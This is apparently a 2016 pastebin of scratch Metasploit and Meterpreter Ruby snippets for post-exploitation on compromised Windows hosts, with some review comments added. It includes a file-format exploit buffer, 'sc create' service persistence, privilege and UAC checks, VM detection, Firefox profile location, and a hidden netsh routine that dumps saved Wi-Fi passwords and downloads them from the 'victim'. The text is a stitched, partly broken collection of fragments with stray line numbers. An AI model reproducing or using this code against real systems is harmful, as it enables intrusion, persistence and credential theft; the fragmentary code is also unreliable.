r00t-3xp10it

msf API calls

Mar 27th, 2016
  # This is my imaginary exploit in ruby
  # NOTE(review): scratch note, not a runnable module -- in a real module the
  # buffer is built inside exploit() and register_options is called from
  # initialize(), so the option exists before the datastore is read.
  include Msf::Exploit::FILEFORMAT
  buf = ""
  buf << "A" * 1024
  buf << [0x40201f01].pack("V")
  buf << "\x90" * 10
  buf << payload.encoded
  file_create(buf)

  register_options(
    [
      OptString.new('FILENAME', [true, 'The malicious file name',  'msf.jpg'])
    ], self.class)
  14.  
  15.  
  16.  
  17.  
  18.  
  # write to local file
  # NOTE(review): `File = ...` reassigns Ruby's core File constant (Ruby warns
  # and the class is shadowed for the rest of the file) and `file` is not
  # defined here; the usual idiom is File.open(path, "w") { |f| f.write(...) }.
  File = file.open("/root/test", "w")
  File.write("sc create #{sname} binpath= \"%tmp%\\t.exe\" start= auto")
  File.close
  23.  
  24. #use backslash to escape double quotes
  25. ("sc create #{sname} bin= \"%tmp%\\fg.exe\"")
  26.  
  27.  
  # random name file
  # (local renamed: `rand` shadows Kernel#rand for the rest of the script)
  log_name = "#{Rex::Text.rand_text_alpha(8)}.log"
  print_good("#{log_name} file created")
  31.  
  32.  
  33.  
  34.  
  35. # check if file exists
  36. print_warning("check if file exists")
  37. path="%systemroot%\\system32\\ola.txt"
  38. if session.fs.file.exist?(path)
  39.  
  40.  
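  # check if directory exists
  # Single quotes keep the backslash: "C:\windows" in double quotes evaluates
  # to "C:windows" because \w is not an escape sequence.
  get_path = 'C:\windows'
  # `#{...}` is only interpolation inside a string; outside one the `#`
  # started a comment and left the call unbalanced.
  if session.fs.directory.exist?(get_path)
    print_good('Vuln path exists')
    CheckCode::Appears
  else
    vprint_error("#{get_path} doesn't exist on target")
    CheckCode::Safe
  end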
  50.  
  51.  
  52.  
  # Ruby function to check directory existence (plain Ruby, local filesystem)
  dir_message = File.directory?('arjun') ? 'Directory exists' : 'Directory not found'
  puts dir_message
  59.  
  60.  
  61. Syntax: client.fs.dir.mkdir("c:\\oldman")
  62. Output: 0
  63. Comment: This will make a directory named "oldman" on the C drive.
  64.  
  65.  
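  # List processes
  # We can access the list of processes from "session.sys.process" using the "get_processes" method.
  # Print processes if it is requested.
  # `listprocesses` is tested as an ordinary truthy flag: the original compared
  # it with the TRUE constant, which only matched the literal `true` and was
  # removed in Ruby 3.0.
  if listprocesses
    print_status('Process list:')
    print_line('')
    session.sys.process.get_processes.each do |proc_info|
      print_good("#{proc_info['name']} [#{proc_info['pid']}]")
    end
    print_line('')
  end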
  77.  
  78.  
  79.  
  # check if is a meterpreter session; bail out of the script otherwise
  client = session
  unless client.type == "meterpreter"
    print_error "Only meterpreter sessions are supported on Windows hosts"
    return
  end
  86.  
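  # report which host the module is running against
  # (was `sysnfo['Computer']` -- a typo for the sysinfo hash, so the line
  # raised NameError whenever sysinfo was present)
  print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil?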
  89.  
  90.  
  # check if its admin (is_admin? -- the old comment said "system")
  if is_admin?
    print_line('we are admin')
  else
    print_line('not admin access level')
  end
  98.  
  99.  
  100.  
  # check if its system (is_system? -- the old comment said "admin")
  if is_system?
    print_line('we are system')
  else
    print_line('not a system access level')
  end
  108.  
  109.  
  110.  
  # Whether User Account Control is active for this session.
  #
  # Only consulted on Windows Vista/7/8/2008/2012 and only when the session
  # is not already SYSTEM; in every other case the answer is false, including
  # when the registry read fails.
  #
  # @return [Boolean] true only when the EnableLUA policy value reads 1
  def is_uac_enabled?
    os_name = session.sys.config.sysinfo['OS']
    return false unless os_name =~ /Windows (Vista|7|8|2008|2012)/
    return false if is_system?

    begin
      lua_value = registry_getvaldata(
        'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System',
        'EnableLUA'
      )
      lua_value == 1
    rescue Rex::Post::Meterpreter::RequestError => e
      print_error("Error Checking if UAC is Enabled: #{e.class} #{e}")
      false
    end
  end
  135.  
  #
  # Returns the UAC Level
  #
  # @see http://technet.microsoft.com/en-us/library/dd835564(v=ws.10).aspx
  # 2 - Always Notify, 5 - Default, 0 - Disabled
  #
  # @return [Integer, nil] the ConsentPromptBehaviorAdmin policy value, or
  #   nil when the value is absent or the registry request fails
  def get_uac_level
    registry_getvaldata(
      'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System',
      'ConsentPromptBehaviorAdmin'
    )
  rescue Rex::Post::Meterpreter::RequestError => e
    print_error("Error Checking UAC Level: #{e.class} #{e}")
    nil
  end
  158.  
  159.  
  160.  
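  #
  # by darkoperator
  # check powershell version on target
  #
  # Reads HKLM\SOFTWARE\Microsoft\Powershell\1\PowerShellEngine and records
  # whether the PowerShell 2.0 engine is registered as a
  # 'host.log.ps_v2_feature' note. Nothing is reported when the OS string
  # does not name a supported Windows version or the key is absent.
  def checkps2
    os = sysinfo['OS']
    # Anchor on "Windows" (case-insensitive): the unanchored
    # /windows 2012|2016|7|8|10/ matched any lone "7" or "8" in the string.
    return unless os =~ /Windows (2012|2016|7|8|10)/i

    print_status('checking if ps2 engine its enable')
    path = "HKLM\\SOFTWARE\\Microsoft\\Powershell\\1"
    subkeys = registry_enumkeys(path)
    # registry_enumkeys may yield nil when the key is missing
    return unless subkeys && subkeys.include?("PowerShellEngine")

    ps2_enabled = registry_getvaldata("#{path}\\PowerShellEngine", 'PowerShellVersion') == '2.0'
    if ps2_enabled
      print_good("\tPowerShell 2.0 engine is enabled")
    else
      print_good("\tPowerShell 2.0 engine not enabled")
    end
    # One report_note for both branches; the original duplicated the call and
    # used `:data{ ... }`, which is not a valid hash entry.
    report_note(
      :host   => session,
      :type   => 'host.log.ps_v2_feature',
      :data   => { :enabled => ps2_enabled },
      :update => :unique_data
    )
  end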
  193.  
  194.  
  195.  
  196.  
  197.  
  198.  
  199.  
  200.  
  201. # display report note ???
  202. hpat = client.fs.file.expand_path("%HOMEPATH%")
  203. syhd = client.fs.file.expand_path("%SYSTEMDRIVE%")
  204.  
  205.       report_note(
  206.         :host   => session,
  207.         :home   => #{hpat},
  208.         :system => #{syhd},
  209.         :update => :unique_data
  210.         )
  211.       print_status("This is a Sun VirtualBox Virtual Machine")
  212.       return "VirtualBox"
  213.     end
  214.   end
  215.  
  216.  
  217.  
  218.  
  219.  
  220. Syntax: client.sys.config.sysinfo["System Language"]
  221. Output: "en_US"
  222. Comment: This returns the operating system language of the compromised system.
  223. -----------
  224. REG QUERY HKLM\System\CurrentControlSet\Control\Nls\Language /v InstallLanguage
  225. 0436 = "af;Afrikaans"
  226. 041C = "sq;Albanian"
  227. 0001 = "ar;Arabic"
  228. 0401 = "ar-sa;Arabic (Saudi Arabia)"
  229. 0801 = "ar-iq;Arabic (Iraq)"
  230. 0C01 = "ar-eg;Arabic (Egypt)"
  231. 1001 = "ar-ly;Arabic (Libya)"
  232. 1401 = "ar-dz;Arabic (Algeria)"
  233. 1801 = "ar-ma;Arabic (Morocco)"
  234. 1C01 = "ar-tn;Arabic (Tunisia)"
  235. 2001 = "ar-om;Arabic (Oman)"
  236. 2401 = "ar-ye;Arabic (Yemen)"
  237. 2801 = "ar-sy;Arabic (Syria)"
  238. 2C01 = "ar-jo;Arabic (Jordan)"
  239. 3001 = "ar-lb;Arabic (Lebanon)"
  240. 3401 = "ar-kw;Arabic (Kuwait)"
  241. 3801 = "ar-ae;Arabic (U.A.E.)"
  242. 3C01 = "ar-bh;Arabic (Bahrain)"
  243. 4001 = "ar-qa;Arabic (Qatar)"
  244. 042D = "eu;Basque"
  245. 0402 = "bg;Bulgarian"
  246. 0423 = "be;Belarusian"
  247. 0403 = "ca;Catalan"
  248. 0004 = "zh;Chinese"
  249. 0404 = "zh-tw;Chinese (Taiwan)"
  250. 0804 = "zh-cn;Chinese (China)"
  251. 0C04 = "zh-hk;Chinese (Hong Kong SAR)"
  252. 1004 = "zh-sg;Chinese (Singapore)"
  253. 041A = "hr;Croatian"
  254. 0405 = "cs;Czech"
  255. 0406 = "da;Danish"
  256. 0413 = "nl;Dutch (Netherlands)"
  257. 0813 = "nl-be;Dutch (Belgium)"
  258. 0009 = "en;English"
  259. 0409 = "en-us;English (United States)"
  260. 0809 = "en-gb;English (United Kingdom)"
  261. 0C09 = "en-au;English (Australia)"
  262. 1009 = "en-ca;English (Canada)"
  263. 1409 = "en-nz;English (New Zealand)"
  264. 1809 = "en-ie;English (Ireland)"
  265. 1C09 = "en-za;English (South Africa)"
  266. 2009 = "en-jm;English (Jamaica)"
  267. 2809 = "en-bz;English (Belize)"
  268. 2C09 = "en-tt;English (Trinidad)"
  269. 0425 = "et;Estonian"
  270. 0438 = "fo;Faeroese"
  271. 0429 = "fa;Farsi"
  272. 040B = "fi;Finnish"
  273. 040C = "fr;French (France)"
  274. 080C = "fr-be;French (Belgium)"
  275. 0C0C = "fr-ca;French (Canada)"
  276. 100C = "fr-ch;French (Switzerland)"
  277. 140C = "fr-lu;French (Luxembourg)"
  278. 043C = "gd;Gaelic"
  279. 0407 = "de;German (Germany)"
  280. 0807 = "de-ch;German (Switzerland)"
  281. 0C07 = "de-at;German (Austria)"
  282. 1007 = "de-lu;German (Luxembourg)"
  283. 1407 = "de-li;German (Liechtenstein)"
  284. 0408 = "el;Greek"
  285. 040D = "he;Hebrew"
  286. 0439 = "hi;Hindi"
  287. 040E = "hu;Hungarian"
  288. 040F = "is;Icelandic"
  289. 0421 = "in;Indonesian"
  290. 0410 = "it;Italian (Italy)"
  291. 0810 = "it-ch;Italian (Switzerland)"
  292. 0411 = "ja;Japanese"
  293. 0412 = "ko;Korean"
  294. 0426 = "lv;Latvian"
  295. 0427 = "lt;Lithuanian"
  296. 042F = "mk;FYRO Macedonian"
  297. 043E = "ms;Malay (Malaysia)"
  298. 043A = "mt;Maltese"
  0414 = "no;Norwegian (Bokmal)"
  299. 0814 = "no;Norwegian (Nynorsk)"
  300. 0415 = "pl;Polish"
  301. 0416 = "pt-br;Portuguese (Brazil)"
  302. 0816 = "pt;Portuguese (Portugal)"
  303. 0417 = "rm;Rhaeto-Romanic"
  304. 0418 = "ro;Romanian"
  305. 0818 = "ro-mo;Romanian (Moldova)"
  306. 0419 = "ru;Russian"
  307. 0819 = "ru-mo;Russian (Moldova)"
  308. 0C1A = "sr;Serbian (Cyrillic)"
  309. 081A = "sr;Serbian (Latin)"
  310. 041B = "sk;Slovak"
  311. 0424 = "sl;Slovenian"
  312. 042E = "sb;Sorbian"
  313. 040A = "es;Spanish (Traditional Sort)"
  314. 080A = "es-mx;Spanish (Mexico)"
  315. 0C0A = "es;Spanish (International Sort)"
  316. 100A = "es-gt;Spanish (Guatemala)"
  317. 140A = "es-cr;Spanish (Costa Rica)"
  318. 180A = "es-pa;Spanish (Panama)"
  319. 1C0A = "es-do;Spanish (Dominican Republic)"
  320. 200A = "es-ve;Spanish (Venezuela)"
  321. 240A = "es-co;Spanish (Colombia)"
  322. 280A = "es-pe;Spanish (Peru)"
  323. 2C0A = "es-ar;Spanish (Argentina)"
  324. 300A = "es-ec;Spanish (Ecuador)"
  325. 340A = "es-cl;Spanish (Chile)"
  326. 380A = "es-uy;Spanish (Uruguay)"
  327. 3C0A = "es-py;Spanish (Paraguay)"
  328. 400A = "es-bo;Spanish (Bolivia)"
  329. 440A = "es-sv;Spanish (El Salvador)"
  330. 480A = "es-hn;Spanish (Honduras)"
  331. 4C0A = "es-ni;Spanish (Nicaragua)"
  332. 500A = "es-pr;Spanish (Puerto Rico)"
  333. 0430 = "sx;Sutu"
  334. 041D = "sv;Swedish"
  335. 081D = "sv-fi;Swedish (Finland)"
  336. 041E = "th;Thai"
  337. 0431 = "ts;Tsonga"
  338. 0432 = "tn;Tswana"
  339. 041F = "tr;Turkish"
  340. 0422 = "uk;Ukrainian"
  341. 0420 = "ur;Urdu"
  342. 042A = "vi;Vietnamese"
  343. 0434 = "xh;Xhosa"
  344. 043D = "ji;Yiddish"
  345. 0435 = "zu;Zulu"
  346. -----------
  347.  
  348.  
  349.  
  350.  
  351.  
  352.  
  353.  
  354.  
  355.  
  # ------------------------------------------
  # DUMP PASSWORD FROM SELECTED ESSID WLAN/LAN
  # ------------------------------------------
  # Reads INTERFACE, DUMP_ESSID and DOWNLOAD_PATH from the datastore; the
  # findstr label is chosen from the reported "System Language".
  def ls_stage3
    inuse = datastore['INTERFACE']
    essid = datastore['DUMP_ESSID']
    dpath = datastore['DOWNLOAD_PATH']
    lang = client.sys.config.sysinfo["System Language"]

    # pick the findstr label by locale
    if lang =~ /pt/
      lag = key
    else
      lag = Chave
    end

    r=''
    # execute cmd prompt in a hidden channelized window!
    # and build dump.log with results (dump) in target %temp% folder
    # If we want to dump only the password of the ESSID and not the whole profile use "key=clear | findstr Key"
    r = session.sys.process.execute("cmd.exe /c netsh #{inuse} show profile #{essid} key=clear | findstr #{lag} > %temp%\\dump.log", nil, {'Hidden' => true, 'Channelized' => true})

    # download 'dump.log' from target machine using one API call
    print_status(" Dumping Credentials of: #{essid}")
    client.fs.file.download("#{dpath}/dump.log","%temp%\\dump.log")

    # close channel when done
    r.channel.close
    r.close

  # error exception function
  # NOTE(review): `rescue ::Exception` also swallows Interrupt and SystemExit;
  # a bare `rescue` (StandardError) is the conventional scope here.
  rescue ::Exception => e
    print_error(" Error: #{e.class} #{e}")
    print_error(" Try to rise meterpreter session to [nt authority/system] before runing this module")
  end
  390.  
  391.  
  392.  
  393.  
  394.  
  395.  
  396.  
  397. # -------------------------------------------------------------
  398.  
  399.  
  400.   def check
  401.     vuln = false
  402.     winver = sysinfo["OS"]
  403.     affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008' ]
  404.     affected.each { |v|
  405.       if winver.include? v
  406.         vuln = true
  407.         break
  408.       end
  409.  
  410.  
  411.  
  412.  
  413.  
  414. # -------------------------------------------------------------------------------------------
  415.  
  416.  
  417. # List all the available interface from victims system
  418.  
  419. Syntax: client.net.config.get_interfaces
  420. Output: [......]
  421. Comment: This returns an array of the interfaces available on the victim's system, along with details such as IP, netmask, mac_address, etc.
  422.  
  423.  
  424.  
  425.  
  426.  
  427.  
  428.  
  429.  
  # ------------------------------------------------------------------------------------------
  # if the command does not display the netsh output,
  # then send the output to a log file
  # and download it
  r = session.sys.process.execute("cmd.exe /c netsh interface show interface > %temp%\\dum.txt", nil, {'Hidden' => true, 'Channelized' => true})
  435.  
  436.  
  437. # Download file from victims system
  438. Syntax: client.fs.file.download("/root/dum.txt","%temp%\\dum.txt")
  439. Output: ["c:\\temp\\dum.txt"]
  440. Comment: This will download dum.txt from the victim's system and save it to the attacker's root directory.
  441.  
  442. #Open a file in read mode and copy the content to some variable
  443. Syntax: file1 = client.fs.file.new("%temp%\\dum.txt")
  444.               vtemp = ""
  445.               until file1.eof?
  446.               vtemp << file_object.read
  447. Output: N.A
  448. Comment: This will copy all the data inside dum.txt and store it in the vtemp variable.
  449.  
  450.  
  451. # display variable to user
  452. print_good("    #{vtemp}")
  453. # print_line("\n" + vtemp.to_s + "\n")
  454. # -------------------------------------------------------------------------------------------
  455.  
  456.  
  457.  
  458.  
  459. # ------------------------------------------------------------------------------------------
  460. # try to fill a table ???
  461. # ------------------------------------------------------------------------------------------
  462.           # building table display
  463.           tbl = Rex::Ui::Text::Table.new(
  464.               'Header'  => 'Interfaces Active',
  465.               'Indent'  => 1,
  466.               'Columns' =>
  467.           [
  468.                       'wlan',
  469.                       'lan'
  470.           ])
  471.  
  472.      # Gather target user data
  473.      file1 = client.fs.file.new("%temp%\\dum.txt")
  474.            vtemp = ""
  475.            until file1.eof?
  476.            vtemp << file.read
  477.  
  478.      # Store in tables and print results on screen
  479.      tbl << [vtemp]
  480.      print_line("\n" + tbl.to_s + "\n")
  481. # ------------------------------------------------------------------------------------------
  482.  
  483.  
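  # This sample demonstrates how a file can be encoded using a framework encoder.
  #
  # Usage: <script> encoder_name file_name [format]
  # Loads the framework from ../../../lib relative to this file, creates the
  # named encoder, encodes the whole input file and prints the result through
  # Msf::Simple::Buffer.transform in the requested format (default 'ruby').
  # The paste had the quotes rendered as typographic ’ and `$@.join` mangled
  # into "[email protected]"; both are restored here.
  $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
  require 'msf/base'

  if ARGV.empty?
    puts "Usage: #{File.basename(__FILE__)} encoder_name file_name format"
    exit
  end

  framework = Msf::Simple::Framework.create
  begin
    # Create the encoder instance.
    mod = framework.encoders.create(ARGV.shift)
    puts(Msf::Simple::Buffer.transform(
      mod.encode(IO.readlines(ARGV.shift).join), ARGV.shift || 'ruby'))
  rescue
    # $! is the current exception, $@ its backtrace
    puts "Error: #{$!}\n\n#{$@.join("\n")}"
  end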
  502.  
  503.  
  504.  
  505.  
  506. # ------------------------------------------------------------------------------------------
  507.  
  508.     if not vm
  509.       if registry_getvaldata('HKLM\HARDWARE\DESCRIPTION\System','SystemBiosVersion') =~ /vbox/i
  510.         vm = true
  511.       end
  512.     end
  513.     if not vm
  514.       srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services')
  515.       if srvvals and srvvals.include?("VBoxMouse")
  516.         vm = true
  517.       elsif srvvals and srvvals.include?("VBoxGuest")
  518.         vm = true
  519.       elsif srvvals and srvvals.include?("VBoxService")
  520.         vm = true
  521.       elsif srvvals and srvvals.include?("VBoxSF")
  522.         vm = true
  523.       end
  524.     end
  525.     if vm
  526.       report_note(
  527.         :host   => session,
  528.         :type   => 'host.hypervisor',
  529.         :data   => { :hypervisor => "VirtualBox" },
  530.         :update => :unique_data
  531.         )
  532.       print_status("This is a Sun VirtualBox Virtual Machine")
  533.       return "VirtualBox"
  534.     end
  535.   end
  536.  
  537.  
  538. # ------------------------
  539.  
  540.  
  # Locates Firefox profile directories below +path+\Mozilla\.
  #
  # Requires Firefox\profiles.ini to stat successfully and the Mozilla
  # directory to be non-empty, then lists Firefox\Profiles\.
  #
  # @param path [String] base directory to search under
  # @return [Array<String>, nil] profile directory paths, or nil when none
  #   were found or an early check failed
  def check_firefox_win(path)
    paths  = []
    ffpath = []
    # `path` is rebound to a new string here, so the caller's argument is not
    # mutated by the `<<` further down
    path   = path + "\\Mozilla\\"
    print_status("Checking for Firefox profile in: #{path}")

    # NOTE(review): the modifier `rescue nil` hides every StandardError from
    # stat, not only a missing file
    stat = session.fs.file.stat(path + "Firefox\\profiles.ini") rescue nil
    if !stat
      print_error("Firefox was not found (Missing profiles.ini)")
      return
    end

    # records the first directory entry only, then stops; ffpath is used just
    # for the emptiness check below
    session.fs.dir.foreach(path) do |fdir|
      #print_status("Found a Firefox directory: #{path + fdir}")
      ffpath << path + fdir
      break
    end

    if ffpath.empty?
      print_error("Firefox was not found")
      return
    end

    #print_status("Locating Firefox profiles")
    path << "Firefox\\Profiles\\"

    # We should only have profiles in the Profiles directory store them all
    begin
      session.fs.dir.foreach(path) do |pdirs|
        next if pdirs == "." or pdirs == ".."
        vprint_good("Found profile: #{path + pdirs}")
        paths << path + pdirs
      end
    rescue
      print_error("Profiles directory is missing")
      return
    end

    paths.empty? ? (nil) : (paths)
  end
  581.  
  582.  
  583. EOF